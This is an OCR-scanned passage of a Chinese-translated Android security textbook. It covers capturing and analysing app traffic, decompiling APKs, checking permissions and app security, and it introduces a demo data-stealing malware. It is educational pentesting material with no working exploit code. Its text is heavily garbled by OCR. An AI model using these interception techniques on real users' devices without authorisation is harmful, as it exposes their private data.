设备 进行 root 处 理 ， 然 后 在 该 设备 上 使 用 像 Wireshark 这 样 的 数据 包 捕 获 分 析 工 具 ; 
另 一 种 是 访问 路 由 器 ， 从 路 由 需 获 取 网 络 中 的 数据 包 。 本 节 中 的 例子 使 用 第 二 种 方 
式 ， 即 利用 安装 在 Linux 系统 上 的 tepdump 工具 捕获 网 络 中 Android 模拟 器 产生 的 
数据 包 ， 然 后 将 捕获 的 数据 包 使 用 Wireshark 工具 打开 并 分 析 ， 如 图 5.5 所 示 。 

在 用 户 的 工作 电脑 上 上， 执行 “emulator -tcpdump < output file > -avd < avd de- 
vice name > ”命令 ， 调用 tepdump 工具 捕获 模拟 器 产生 的 流量 数据 包 。 

图 5.5 展示 了 被 捕获 的 流量 数据 包 ， 这 些 数 据 包 产生 于 Android 模拟 器 使 用 浏 
览 器 访问 www. google. com 网 站 。 从 Wireshark 显示 的 数据 包 列 表 中 可 以 看 到 ，DNS 
服务 需 的 了 正 地 址 是 10.0.2.3， 并 且 路 由 玲 / 网 关 的 IP 地 址 为 10.0.2.2。 耻 地址 为 
10.0.2. 15 的 源 地 址 端 (也 就 是 Android 模拟 器 ) 回 www. google. com 网 站 发 送 了 一 
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E ui s coram M raph rod NC 


TE 





to Time Source Destination Protocol info 
l y CLEME Na 
26.832938 RealtekU 12:35:82 Broadcast who has 18.8.2.15? Tell 19.9.2.2 
3 6,036452  RealtekU 12:34:56 Realteku 12:35:02 ARP 10.0.2.15 is at 52:54:00:12:34:56 








5 18,8036585 10.8.2.2 18,0.2.15 TCP — 48832 > personal- agent [ACK] t i Ackel Win=8769 Len=9 [14 

7 18.037949 19.8.2.2 1.0.2.15 TCP 48832 > personal-agent [PSH, ACK] Seq-l Ackel Winz8760 Len-3] —— 

& 18.040586 18.9.2.15 18.9.2.2 TCP . personal-agent > 48832 [ACK] Seg=1 Ack-32 Win=5840 Lenz 

9 18.964724 10.8.2.15 19.8,2.2 TCP  personal-agent > 48837 [PSH, ACK) Seqel Acke32 Wins5840 Lens33 —— 0 
10 18.064834 18.8.2.2 18.8.2.15 TCP 48832 > personal-agent [ACK] Seq=32 Ack=34 Win=8768 Len=0 


1i 54.194217 Realtekü 12:34:56 Broadcast 
12 54. 194221 Realteku 12:35:03 RealtekU 12:34:58 


Who has 10.8,2,3? Tell 16.9.2.15 1 A Jp "n Py | 
18. 3.2.3 is at 52:54:00:12:35:03 i cT p 











(433 54. 4 i pti 8,2. x, 
S M NN ARA 


15 54.212722 18.9.2.15 Mo imt m 








74.125.71.99 — CP 
16 54.214747 74.125.71.99 19.6.2.151 .— TEP; http » 38945 [rina 
Seni 二 16.8.2.15 74.125.71.993  TCP 38045 > http ACK] Seq 
iom sn à vmi Ms. HTTP GET /meli oid.googlei ea 
71.99 44.9.2.15 ^ — P http» 38645 (3 Segel Ac Nin-8760 L 
125.71,99 . 16.8.2.15 TCP [TCP segment of a reassembled PDU] 
zu Tow /138.8.2.15 TP ' segment of a reass d PU] - 
22 54,852412 39,8,2.15 | 74.3325.0»0$.99 TP 
23 54.1 4.125.71,59 Lowe] 5 APERTA 
24 54; 19.0.2.15 74.125.71.99 P 


25 54. pied 18.8.2.15 


26 54 RSIAAT 74.105,71 68 — 


TCP 
74.125.71.93 | TGP 
16.8.0 15. TP 





图 5.5 在 Wireshark 中 分 析 tepdump 捕获 的 数据 包 


个 HTTP GET 请 求 ， 如 图 5.6 所 示 。 


x pén E d : 
a iq i i | 


B2 5619777 74.1325.71.99 
53 56.192779. 74.125.71.39 
64 56.152781 74.125.71.39 
Lame eee 


站 Tw enims | 


n "am 18.0.2,15 74.125.71.99 Te | 
F ^or M £] 2: 71.9! f het ar yd. 
di. $3: 708 brier on hw | Sid bisi, Peg tiets tatur BUNC 
, Ethernet Il, Src: [ou 12:34:56 (52:54:00:12:34:56), 0st: Realtek 12:35:02 (52:54:00:12:3 
t Internet Protocol, Sre: 18.0.2.15 (18,80.2.15), Dst: 74.125.71,99 (74.125.71.99) , 
* Transmission Control Protocol, Sre Port: 38045 (38845), Ost Port: http (B8), Seq: 431, Ack: 2 


4 | De ye i 
- ME b. 74 789 
aA (9 eld 





5.6 Wireshark 中 数据 包 列表 显示 的 HTTP GET 请 求 
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5.2.4 Android 操作 系统 的 漏洞 


Android 操作 系统 (Operating System, OS) 基于 Linux 操作 系统 ，Linux 系统 是 
Android 操作 系统 的 底层 核心 。Android 是 一 种 开源 的 操作 系统 ，Google 公司 对 外 开 
放 Android 系统 软件 栈 源码 。 因 此 ， 人 们 可 以 自由 地 开发 和 贡献 / 复 用 Android 系统 
AURIS Google 公司 拥有 官方 的 Android 系统 开发 团队 ， 负 责 开 发 、 维 护 官 方 的 
Android 系统 发 布 版 本 。 但 是 ， 由 于 Android 系统 开源 、 免 费 的 特点 ， 任 何人 都 可 
以 目 由 地 下 载 、 查 看 、 修 改 ， 以 及 发 布 自己 的 Android 系统 版 本 。 很 多 设备 厂商 
(例如 ，HTIC、 三 星 等 ) 会 根据 自己 的 需求 定位 ， 修 改 、 定 制 Android 操作 系统 ， 
对 外 却 仍 然 称 他 们 生产 的 设备 运行 的 是 “Android” 系统 。 

在 探讨 Android 操作 系统 上 发 现 的 这 类 问题 之 前 ， 首 先 需要 弄 清 究竟 谁 应 当 为 
这 些 问 题 负 责 。 是 Google 公司 ? 毕竟 它 是 Android 操作 系统 官方 发 布 版 本 的 所 有 
者 。 或 者 是 其 他 移动 设备 厂商 ?比如 像 HTC 等 公司 ， 因 为 他 们 使 用 这 些 免费 的 
Android 操作 系统 ， 并 对 其 做 了 一 定 的 修改 。 

当然 ， 也 可 以 先 统 过 这 个 问题 。Android 操作 系统 使 用 提供 给 Linux 系统 的 驱 
动 程序 ， 这 些 驱 动 程序 在 设计 时 可 能 并 没有 考虑 安全 问题 。 而 且 ， 许 多 驱动 程序 可 
能 还 存在 老 旧 过 时 的 代码 ， 新 增加 的 代码 通常 建立 在 这 些 代码 之 上 。 所 以 ， 这 些 底 
层 安全 问题 的 权 责 并 不 明确 。 

一 些 C/C ++ 代 码 中 的 典型 问题 ， 在 Android 操作 系统 中 也 可 能 出 现 。 比 如 ， 
资源 泄露 、 内 存 角 演 、 程 序 执行 流程 问题 、 违 规 数据 访问 ， 以 及 指针 引用 等 问题 . 
此 外 ， 在 这 些 代 码 中 ,， 通 第 还 会 存在 一 些 “ 死 代码 ”( 也 就 是 不 被 任何 其 他 程序 执 
行 流程 调用 的 代码 ) ， 对 于 这 样 的 代码 ， 需 要 向 用 户 指 出 来 ， 加 以 修正 。 


5.3 Android 应 用 程序 渗透 测试 


在 Android 系统 上 ， 大 部 分 的 渗透 测试 都 是 针对 应 用 程序 展开 的 ， 这 些 应 用 程 
序 既 包括 系统 内 置 的 应 用 程序 ， 如 浏览 器 、 地 图 等 应 用 ， 也 包括 其 他 的 第 三 方 应 用 
程序 ， 如 Android 应 用 市 场 上 提供 的 应 用 。 


5.3.1 Android 应 用 程序 


针对 Android 应 用 程序 的 渗透 测试 同 平台 上 其 他 软件 的 测试 一 样 。 在 对 Android 
应 用 程序 进行 渗透 测试 的 过 程 中 ， 需 要 考虑 的 问题 主要 有 攻击 面 、 组 件 之 间 (内 
部 组 件 和 外 部 组 件 ) 的 交互 、 通 信 ， 以 及 存储 等 问题 。 

Mog: 渗透 测试 只 需 针 对 应 用 程序 的 核心 功能 。 根 据 应 用 程序 具有 的 功能 和 
特点 的 不 同 ， 渗 透 测试 人 员 所 做 的 工作 需要 面 回 相对 重要 的 问题 ， 比 如 认证 、 数 据 
操作 等 功能 ， 并 且 测 试 往往 需要 在 相对 底层 的 组 件 上 进行 。 对 于 不 需要 处 理 重 要 数 
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据 的 本 地 组 件 来 说 ， 在 这 类 组 件 上 进行 的 测试 应 当 是 有 所 区 分 的 。 比 如 ， 和 需要 与 
外 部 应 用 程序 /系统 交互 的 组 件 相 比 ， 对 于 这 些 组 件 的 测试 无 需 消 耗 过 多 的 测试 
时 间 。 

组 件 交 互 : 应 用 程序 可 以 使 用 多 种 进程 间 通 信 (IPC) 机 制 同 其 他 Android 应 
用 程序 或 外 部 网 络 服务 器 进行 交互 ， 包 括 基 于 socket (ERF) 的 通信 、 远 程 过 程 
调用 (Remote Procedure Call，RPC)、 传 递 /接收 广播 、 使 用 Intent 组 件 ， 以 及 其 他 
的 一 些 Android 特有 IPC 交互 方式 。 这 些 通信 方式 中 很 多 都 需要 权限 许可 ， 所 以 ， 
针对 如 下 两 个 方面 的 检查 至 关 重 要 。 

e 应 用 程序 请 求 的 权限 。 

e 应 用 程序 对 其 他 应 用 程序 开放 的 功能 。 

读者 应 该 已 经 比较 了 解 了 Android 系统 的 权限 ， 本 书 在 第 4 章 已 经 介绍 了 这 部 
分 概念 。Android 应 用 程序 所 需 的 权限 定义 在 Manifest. xml XFA, WAAR m 
反 编 译 Android 应 用 程序 的 安装 包 文 件 ， 也 就 是 apk 文件 ， 然 后 才能 访问 并 查看 该 
文件 。 反 编译 Android apk 文件 并 取得 相应 的 Manifest. xml 文件 的 步骤 如 图 5. 7 和 图 
5. 8 所 示 。 


O A O A Anmol — pentestusrliQXools-gibbons-vm-2: —-/Android/downloads "d 


pentestusrietools-gibbons-vm-2:-/Android/downloads$ apktool decode iCalendar* ac 
bcad45094de7e877b656db1c28ada2.apk iCal 
I: Baksmaling... 

Loading resource table... 

Decoding resources... 

Loading resource table from file: /home/pentestusri/apktool/framework/1l.apk 


[e 

E: 

om 

I: Copying assets and libs... 
pentestusrletools-gibbons-vm-2;-/Android/downloads$ | 





图 5.7 使 用 apktool 工具 提取 Manifest 权限 配置 文件 


apk 文件 由 多 种 文件 打包 而 成 ， 包 括 安 装 包 信息 描述 目录 META-INF、 资 源 文 
件 目 录 res、Android 程序 全 局 配置 文件 AndroidManifest. XML, Dalvik 字 节 码 文 件 
classes. dex， 以 及 编译 后 的 二 进 制 资源 文件 /目录 resources. arse 等 。apktool 工具 能 
够 用 来 从 一 个 Android 应 用 程序 安装 包 (apk 文件 ) 中 ,提取 AndroidManifest. XML 
配置 文件 。 使 用 方法 为 apktool decode « apkname > < directory > s 

对 于 Android 特有 的 组 件 ， 如 Intent, Broadcast Receiver, 测试 人 员 至 少 需要 确 
定 以 下 几 个 回 题 ; 

1) 不 能 通过 IPC 通信 传递 敏感 数据 。 例 如 ， 不 可 使 用 Intent, broadcast ZH f 
传递 。 

2) 不 能 将 Intent 过 滤 机 制 用 于 确保 应 用 程序 安全 目的 。 尽 管 Intent IEAA 
能 够 管理 和 控制 应 用 程序 可 以 处 理 的 Intent， 但 是 这 只 对 “ 隐 式 类 型 ”的 ,ntent 有 
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DDNMAnmo! pentestusr1Qtools-gibbons-vm-2:; ~/Android/downloads. 
«meta-data android:name-"ADMOB PUBLISHER ID" android:value-"al4cff13da97 


c54" /> 
«meta-data android:name-"ADMOB INTERSTITIAL PUBLISHER ID" android:value- 
"al4cffi3da97c54" /> 
«eneta-data android:names"ADMOB ALLOW LOCATION FOR ADS" android:values"tr 
5 MB /Sh 
«activity android:themes"&android;style/Theme.NoTitleBar.Fullscreen" and 
roid:name-"com.admob .android.ads.AdMobActivity" android:configChanges-"keyboard! 
keyboordHiddenlorientation" /> 
«receiver android:name-"com.admob .android.ads .analytics.InstallReceiver" 
android:exported-"true"» 
«intent-filter» 
«action android:names"com,android.vending.INSTALL REFERRER" /> 
c/intent-filter» 
</receiver> 
</application> 
«uses-permission android:name-"android.permission.INTERNET" /> 
«uses-pe"rmission ondroid:name-"android.permission.ACCESS COARSE LOCATION" /> 
«uses-permission android:name-"android.permission.RESTART PACKAGES" /» 
«uses-permission android:name-"android.permission.RECEIVE. SMS" /> 
«uses-permission android:names"android.permission.SEND SMS" /> 
«uses-permission android:name-"gndroid.permission.SET WALLPAPER" /> 
«uses-sdk android:minSdkVersions"3" /> 





图 5.8 从 apk 中 提取 的 Manifest 权限 配置 文件 示例 


效 。 应 用 程序 仍 可 以 创建 “ 显 式 类 型 ”的 Intent， 迫 使 目标 应 用 程序 对 该 Intent 进 
行 处 理 。 

3) 不 能 使 用 粘性 广播 〈Sticky Broadcast) 传输 敏感 数据 ， 因 为 发 送 广播 的 应 
用 程序 无 法 控制 该 广播 会 被 哪 一 个 程序 所 接收 。 

4) 应 用 程序 请 求 的 权限 不 能 多 于 其 功能 所 需 的 权限 数量 ， 也 就 是 遵守 最 少 所 
需 权 限 原 则 。 

通信 : 确定 应 用 程序 同 外 部 网 络 系统 /服务 器 进行 通信 的 渠道 是 否 安 全 是 相当 
重要 的 。 在 这 类 通信 中 ， 建 立 的 连接 应 当 是 经 过 加 密 的 。 此 外 ， 检 查 这 些 与 之 通信 
的 系统 /服务 器 是 如 何 被 选择 的 ， 也 是 同样 重要 的 。 

数据 ， 在 应 用 程序 评估 中 ， 最 核心 的 问题 还 是 应 用 程序 处 理 的 数据 。 一 般 的 应 
用 程序 能 够 以 文件 或 数据 库 的 形式 读 写 数据 ， 这 两 种 方式 既 可 以 使 数据 仅 能 对 应 用 
程序 可 读 ， 也 可 以 使 这 些 数据 对 外 可 读 。 如 果 应 用 程序 的 功能 中 包含 敏感 数据 的 处 
理 操作 ,测试 人 员 就 应 当 谨 慎 地 检查 对 这 些 包含 敏感 数据 的 文件 和 数据 库 进 行 操作 
的 权限 。 而 且 ， 测 试 人 员 还 应 当 检 查 应 用 程序 生成 的 日 志和 共享 配置 文件 2 ， 查 看 
是 否 存 在 由 于 开发 者 的 下 忽 导致 敏感 数据 骏 露 的 问题 。 大 多 数 的 应 用 程序 需要 同 外 


加 ”共享 配置 文件 (shared preference), Android 系统 的 另 一 种 数据 存储 方式 ， 它 是 一 种 轻 量 级 的 键 值 对 
存储 方式 ， 以 xml 文件 形式 保存 ， 存 储 Android 应 用 程序 需要 的 一 些 配置 参数 或 数据 。 一 一 译 者 注 


$53 Android 渗透 测试 79 


部 环境 进行 通信 (或 是 同 外 部 网 络 进行 通信 ) ， 并 且 将 大 量 的 数据 存储 在 远程 的 服 
务 器 /数据 库 上 。 对 于 这 种 情况 ， 测 试 人 员 还 需要 检查 这 些 被 上 传 和 存储 在 异地 服 
务 器 /应 用 程序 上 的 数据 。 此 外 ， 还 需 检 查 这 些 敏感 的 数据 参数 是 如 何 被 传递 /存储 
的 ， 例 如 安全 证 书 等 。 

正确 使 用 加 密 技 术 : 测试 人 员 应 当 查 看 应 用 程序 是 否 使 用 了 标准 的 加 密 方 法 。 
例如 ， 在 检查 安全 证 书 的 过 程 中 ， 应 用 程序 是 否 检 查 了 之 前 批准 的 公 角 ?应 用 程序 
如 何 验证 安全 证 书 ? 应 用 程序 是 否 进 行 了 严格 的 安全 证 书 核 实 ? 

向 浏览 器 传递 信息 (包括 参数 ); 测试 人 员 应 当 检 查 应 用 程序 是 否 会 开启 浏览 
器 应 用 程序 ， 如 果 存 在 这 种 操作 ， 该 应 用 程序 是 如 何 传 递 相关 参数 的 (例如 ， 应 
用 程序 是 通过 发 送 GET 请 求 ， 还 是 POST 请 求 传递 数据 的 )。 

其 他 事项 : 测试 人 员 应 当 检查 应 用 程序 在 后 台 运 行 的 各 种 服务 ， 查 看 这 些 服 务 
对 资源 的 作用 和 影响 。 此 外 ，Android 应 用 程序 的 渗透 测试 还 包括 一 些 额 外 的 步骤 。 
由 于 Android 应 用 程序 使 用 Java 语言 编写 ， 因 此 必须 检查 这 些 Java 代码 ， 查 看 是 否 
存在 一 些 典 型 的 Java 程序 漏洞 。 如 果 Android 应 用 程序 中 还 涉及 了 本 地 代码 或 支持 
库 ， 那 么 还 需要 仔细 地 检查 这 些 本 地 代码 或 支持 库 ， 验 证 是 否 有 漏洞 的 存在 。 了 最 
后 ， 对 Android 应 用 程序 如 何 处 理 数据 存储 问题 的 检查 ， 也 是 一 个 至 关 重 要 的 方 
面 ， 这 部 分 内 容 在 后 面 章节 将 会 涉及 。 

要 想 检 查 应 用 程序 与 外 界 的 通信 ， 则 需要 配置 一 个 代理 服务 器 ， 用 于 拦截 应 用 

序 同 外 部 网 络 之 间 的 流量 数据 包 ， 可 采用 如 下 步骤 进行 。 

拦截 浏览 句 〈 基 于 HTTP) 应 用 程序 的 流量 数据 包 : 

1) 在 使 用 的 主机 或 个 人 工作 电脑 上 下 载 并 安装 代理 服务 器 (例如 ，Burp € 
件 中 平台 工具 ) ， 开 启 “intercept (拦截 ) ”选项 。 

2) 在 Android 手机 或 模拟 器 上 安装 代理 服务 器 ， 如 图 5.9 所 示 。 在 这 个 示例 
中 ， 本 书 以 一 个 Android 模拟 器 为 例 。 所 以 ， 需 要 使 用 地 址 “10. 0. 2.2” 作 为 代理 
IRI RH) IP 地 址 。 

3) 在 Android 模拟 器 上 打开 浏览 器 应 用 程序 ， 并 且 输 入 一 个 URL 地 址 。 

4) 查看 Burp 套件 平台 工具 捕获 的 流量 数据 包 ， 如 图 5. 10 和 图 5. 11 所 示 。 

拦截 其 他 应 用 程序 的 流量 数据 包 : 

1 ) 启动 应 用 程序 ， 本 书 以 互联 网 中 继 聊 天 (Internet Relay Chat, IRC) 应 用 
程序 Yaaic 软件 为 例 ， 如 图 5. 12 所 示 。 

2) 使 用 Wireshark 软件 捕获 该 应 用 程序 产生 的 流量 数据 包 ， 并 且 使 用 其 地 
hk (本 例 中 ，Android 设备 的 IP 地 址 为 192. 168. 0. 107) iii fii oe ox Pe ALS BL 


O Burp 套件 是 用 于 攻击 web 应 用 程序 的 集成 平台 。 它 包含 了 许多 工具 ， 并 为 这 些 工具 设计 了 许多 接口 ， 
以 加 快 攻击 应 用 程序 的 过 程 。 一 一 译 者 注 
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图 $.10 Burp 套件 工具 拦截 的 Android 浏览 器 通信 数据 
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图 5.11 Burp 套件 工具 捕获 的 明文 形式 的 安全 证 书 
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E] 5.12 Android 系统 上 的 Yaaic 应 用 软件 
3) 使 用 Wireshark 软件 的 相应 选项 查看 捕获 的 流量 数据 包 ， 如 图 3. 15a 和 bb 所 示 。 
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b) 使 用 Wireshark 分 析 捕 获 的 数据 包 
5. 13 


第 5 章 Android 渗透 测试 83 


$5.3.2 ”应 用 程序 安全 


前 面 已 经 介绍 了 针对 Android 系统 问题 渗透 测试 的 步骤 。 除 此 以 处 ， 对 于 An- 
droid 应 用 程序 来 说 ， 还 需要 在 程序 的 代码 上 和 设计 上 展开 分 析 (以 及 代码 审查 )， 
检查 一 些 销 见 的 安全 漏洞 。 这 些 漏洞 和 问题 可 大 致 地 分 为 以 下 几 类 ， 见 表 $.15 

表 5.1 应 用 程序 的 安全 问题 


安全 问题 说 BH 
认证 用 户 识 别 的 问题 
访问 控制 认证 之 后 的 用 户 权限 问题 
审核 与 记录 日 志和 审核 的 问题 
加 密 加 密 及 安全 通信 问题 
证 书 处 理 用 户 密码 及 其 他 证 书 处 理 问 题 
数据 处 理 针对 人 敏感 数据 的 处 理 问 题 
数据 泄露 有 意 或 无 意 的 信息 泄露 问题 
错误 检测 简洁 报错 问题 
输入 验证 可 徘 用 户 输入 验证 问题 
会 话 管 理 用 户 会 话 管 理 最 优 体验 问题 
资源 处 理 资源 处 理 ， 以 及 内 存 管理 问题 
补丁 软件 及 时 修补 /更 新 问题 


这 些 问 题 需要 按照 严重 程度 (人 危险、 高 风险 、 中 等 风险 和 低 风 险 ) 和 利用 的 
困难 程度 (高 难度 、 中 等 难度 和 易于 发 现 ) 列 出 。 对 表 5. 1 列 出 的 部 分 安全 问题 
的 总 结 如 下 : 

1) 认证 问题 : 需要 验证 用 户 证 书 是 否 使 用 了 加 密 通道 进行 传输 ， 以 及 采用 的 
认证 机 制 是 否 符 合 标准 做 法 。 

2) 访问 控制 : 需要 验证 认证 通过 的 用 户 是 否 仅 能 访问 相应 证 书 授权 的 资源 和 
功能 ， 确 保 用 户 不 能 绕 过 这 些 访 问 控制 机 制 。 

3) HÆ: 通过 验证 ， 确 保 这 些 日 志 没有 包含 敏感 信息 ， 并 且 不 能 被 其 他 无 关 
的 应 用 程序 所 访问 ， 以 及 需要 为 这 些 证 书 设置 恰当 的 访问 权限 。 

4) 加 密 ， 通过 验证 ， 确 保 敏 感 信息 只 能 通过 安全 的 通道 进行 传输 ， 并 且 对 这 
类 敏感 信息 的 传输 使 用 了 强大 的 加 密 算 法 。 此 外 ， 还 需要 验证 应 用 程序 是 否 使 用 了 
不 恰当 的 加 密 协 议 。 

5) 数据 泄露 : 通过 验证 ， 确 保 应 用 程序 没有 因为 开发 人 员 的 疏忽 ， 意 外 地 骏 
露 数据 。 应 用 程序 不 应 该 使 用 日 志 、IPC 调用 、URL 调用 和 文件 等 方式 向 其 他 应 用 
程序 提供 数据 。 

6) 数据 验证 ， 通过 验证 ， 确 保 应 用 程序 没有 使 用 来 自 非 可 信 源 的 输入 。 例 
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如 ， 直 接 取 用 未 经 处 理 的 用 户 输入 命令 进行 SQL 查询 ， 以 及 执行 其 他 的 敏感 操作 。 

7) 错误 报告 : 通过 验证 ， 当 应 用 程序 因 出 现 异常 而 抛 出 错误 时 ， 确保 抛 出 的 
错误 信息 中 没有 记录 并 上 报 全 部 的 出 错位 置 轨迹 栈 信息 ， 并 且 在 抛 出 的 错误 信息 
中 ， 没 有 包含 敏感 的 信息 数据 。 

8) 会 话 管理 : 通过 验证 ， 确 保 应 用 程序 在 会 话 管 理 上 ， 和 采用 了 最 好 的 做 法 和 
手段 。 例 如 ， 超 时 、 会 话 标识 符 和 使 用 令 牌 (Token), F, 

9) URL 参数 : 确保 应 用 程序 没有 以 明文 的 形式 将 敏感 参数 作为 URL 的 部 分 内 
容 ， 然 后 使 用 URL 传递 这 些 敏 感 参数 信息 。 

10) 可 预测 资源 : 需要 确保 应 用 程序 不 会 产生 易于 猜 出 的 标识 符 或 令 牌 
(Token), 

渗透 测试 应 当 根据 下 述 最 佳 做 法 ， 提 供 标 准 的 应 用 程序 测试 流程 。 

1) 在 确定 漏洞 后 ， 应 及 时 修补 支持 库 和 应 用 程序 的 漏洞 ， 打 好 安全 补丁 。 

2) 不 能 将 敏感 信息 (如 SSN (Social Security Number, $E ES m )) E 
URL 参数 ， 进 行 传 递 。URE 内 的 信息 可 以 使 用 GET 请 求 的 方式 来 获取 ， 并 且 会 
录 在 很 多 地 方 。 相 对 而 言 ，POST 请 求 方式 可 以 解决 这 个 问题 。 但 是 ， ER 
POST 请 求 ， 信 息 不 会 出 现在 URL 中 ， 但 这 种 请 求 的 方式 仍然 会 在 请 求 头 部 字段 中 
泄露 这 些 信息 。 实 际 上 ,对 于 敏感 的 信息 ， 需 要 使 用 HTTPSC 的 连接 方式 进行 传输 
才 可 以 。 

3) 限制 认证 过 程 的 次 数 ， 使 暴力 攻击 的 方式 无 法 实现 破解 认证 的 目的 。 

4) 使 用 安全 套 接 字 层 控制 和 传输 所 有 请 求 的 资源 。 

5) 不 使 用 URL 发 送 会 话 标识 符 。 

6) 使 用 难以 被 猿 出 的 令 牌 (Token)， 从 而 确保 令 牌 不 易 被 破解 。 

7) 强制 执行 密码 复杂 性 检测 。 

8) 不 在 日 志文 件 内 包含 敏感 信息 ， 并 且 使 用 恰当 的 措施 确保 日 志文 件 的 安 
全 性 。 

9) 对 存储 在 本 地 和 外 部 存储 设备 上 的 文件 进行 加 密 。 

10) 进行 适当 的 数据 验证 ， 防 范 XSS、SQLi， 以 及 命令 注入 等 方式 的 攻击 。 

对 Android 应 用 程序 进行 代码 审查 ， 可 以 确定 以 下 问题 : 

D) 命令 注入 : 攻击 者 可 以 执行 指定 的 命令 ， 或 者 在 指定 的 环境 中 执行 这 些 命 
令 ， 从 而 绕 过 安全 控制 。 这 方面 比较 典型 的 例子 有 : 在 使 用 SQL 语句 查询 数据 库 
时 ， 用 户 自 己 编写 输入 语句 查询 SQLite 数据 库 。 

2) 资源 泄露 : 资源 使 用 后 〈 如 文件 处 理 完毕 等 ) ， 应 用 程序 没有 释放 这 些 资 


© HTTPS ( Hypertext Transfer Protocol over Secure Socket Layer， 位 于 安全 套 接 宇 层 之 上 的 超 文本 传输 协 
议 ) ， 是 以 安全 为 目标 的 HTTP 通道 ， 即 HTTP 的 安全 版 。 
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源 ， 造 成 这 些 资 源 无 法 被 系统 回收 。 这 可 能 导致 性 能 问题 ， 但 也 增加 了 相应 资源 被 
亚 意 用 户 / 应 用 程序 禄 取 的 风险 。 

3) 报错 处 理 : 如 果 开 发 者 没有 考虑 到 特定 问题 的 代码 体系 /代码 执行 流程 ， 
就 会 导致 特定 代码 流程 运行 时 ， 应 用 程序 没有 执行 所 需 的 清理 /访问 控制 检查 ， 引 
起 程序 异常 或 安全 漏洞 问题 。 

4) 不 安全 的 JNI (Java Native Interface, Java 本 地 接口 ) 调用 : Android 应 用 程 
序 能 够 通过 JNI 调用 C 语言 编写 的 本 地 代码 ， 这 有 可 能 使 应 用 程序 遭受 这 些 本 地 代 
码 中 存在 的 底层 问题 的 影响 。 


5.4 其 他 问题 


5.4.1 内 部 、 外 部 以 及 云端 的 数据 存储 


Android 应 用 程序 可 以 使 用 很 多 种 方式 存储 数据 ， 包 括 文件 、 数 据 库 、 共 享 配 
置 文件 ， 以 及 缓存 。 数 据 既 可 以 被 存储 在 内 部 的 存储 器 上 ， 也 可 以 存储 在 外 部 的 存 
储 卡 上 。 然 而 ， 如 果 数 据 使 用 明文 的 形式 存储 在 设备 上 ， 那 么 当 设 备 被 恶意 破解 或 
被 偷 时 ， 这 些 数据 资料 将 被 暴露 。 通 常 ， 最 好 的 办 法 是 将 这 些 需 要 存储 的 数据 进行 
加 密 。 所 以 ， 对 于 Android 应 用 程序 来 说 ， 应 当 使 用 一 种 强大 的 加 密 算 法 对 需要 存 
储 的 数据 进行 加 密 。 同 这 些 已 公开 的 加 密 工 具 相 比 ， 内 部 加 密 的 安全 效果 最 差 。 

测试 人 员 需 要 检查 如 下 几 个 数据 存储 的 位 置 : 本 地 存储 (例如 ，Android 应 用 
程序 的 文件 、SQLite 数据 库 、 缓 存 和 共享 配置 文件 ) 和 外 部 存储 (例如 ， 在 外 部 
存储 设备 上 存储 的 文件 、 网 络 “ 云 端 ” 存 储 )。 

代码 审查 用 于 确定 文件 /数据 存储 操作 的 位 置 ， 需 要 审查 的 典型 数据 操作 包括 : 
打开 /创建 文件 、 访 问 文件 夹 及 其 内 容 、 访 问 缓存 /配置 文件 ， 以 及 打开 /创建 数据 
库 等 。 


8.5. J£ 


本 章 主要 介绍 了 Android 系统 上 的 渗透 测试 。 介 绍 了 如 何 对 Android 操作 系统 
进行 渗透 测试 ， 讨 论 了 应 用 程序 的 安全 问题 、Android 应 用 程序 的 渗透 测试 ， 以 及 
静态 分 析 。 同 时 ， 还 分 析 了 近期 出 现 的 几 例 Android 应 用 程序 的 安全 问题 。 

建议 读者 下 载 几 个 开源 的 Android 应 用 程序 源码 ,或 自己 编写 一 个 Android 应 
用 程序 ， 然 后 使 用 本 章 介 绍 的 技术 依次 试验 测试 一 遍 。 读 者 也 可 以 登录 本 书 网 站 下 
载 作者 开发 的 应 用 程序 ， 对 其 进行 测试 。 


$ 67€ Android P} JH ££ JF 3 pj Lf 


本 章 将 介绍 亚 意 软件 的 基础 知识 一 一 如 何 识 别 恶 意 软 件 、 亚 意 软 件 的 行为 ， 以 
及 恶意 软件 的 特征 。 然 后 ， 讨 论 一 个 本 书 作 者 编写 的 Android 恶意 应 用 程序 ， 并 通 
过 该 应 用 程序 ， 向 读者 演示 恶意 软件 如 何 绕 过 Android 系统 的 内 置 检 查 机 制 。 

该 Android 恶意 程序 的 功能 包括 : 从 取 用 户 浏 览 器 历史 信息 、SMS， 以 及 电话 
呼叫 记录 ， 而 且 该 应 用 还 试图 耗 尽 手 机 电量 。 此 外 ， 本 章 还 将 以 男 一 个 应 用 程序 为 
例 ， 向 读者 展示 如 何 对 恶意 软件 进行 逆向 工程 或 分 析 。 通 过 本 章 的 内 容 ， 读 者 将 能 
{EH Java 语言 自行 编写 Android 演示 应 用 程序 ， 熟悉 逆 向 工程 相关 工具 ， 并 能 够 
对 各 种 Android 应 用 程序 进行 反 编译 。 


6.1. HE4 


逆向 工程 是 通过 分 析 目 标 设备 、 物 体 或 系统 的 结构 、 功 能 ， 以 及 操作 ， 从 而 发 
现 其 技术 原理 的 过 程 2。 一 般 ， 逆 向 工程 需要 对 样本 对 象 (如 机 械 设 备 、 电 子 元 
件 、 软 件 程序 、 生 物 制品 、 化 学 制品 ， 或 有 机 物 ) 进行 拆 件 或 分 解 ， 具 体 地 分 析 
样本 对 象 在 整体 中 的 运作 细节 ， 或 者 是 设法 制造 一 个 新 的 设备 或 应 用 程序 ， 而 无 需 
使 用 原始 的 样本 对 象 或 仅仅 是 简单 复制 〈 无 需 理解 ) 原始 的 样本 对 象 即 可 -。 

如 今 ， 一 般 用 户 下 载 或 购买 应 用 软件 安装 ， 往 往 不 会 考虑 太 多 这 些 安装 软件 的 
功能 。 简单 的 几 行 描述 和 用 户 的 评价 可 能 就 足以 说 服用 户 去 尝试 该 软件 。 除 了 一 些 
知名 软件 〈 如 微软 或 苹果 等 大 型 软件 公司 开发 的 软件 ) ， 或 通过 开源 社区 提供 的 软 
件 外 ， 很 难 去 验证 这 些 软件 的 可 靠 性 或 难以 确保 这 些 软件 的 功能 不 存在 问题 。 对 于 
个 人 电脑 来 说 ， 可 以 使 用 各 种 共享 软件 、 试 用 软件 或 是 免费 软件 ， 如 今 ， 对 于 移动 
设备 也 是 如 此 ， 而 且 只 需 用 户 点 击 一 下 即 可 安装 这 些 软 件 。 每 天 在 移动 应 用 市 场 中 
都 会 出 现 数 以 百 计 的 应 用 软件 ， 这 些 软 件 出 自 于 从 顶级 到 新 手 的 各 种 软件 开发 者 。 

对 于 移动 设备 ， 尤 其 是 Android 设备 ， 问 题 就 变 得 更 加 复杂 了 。 由 于 众多 的 
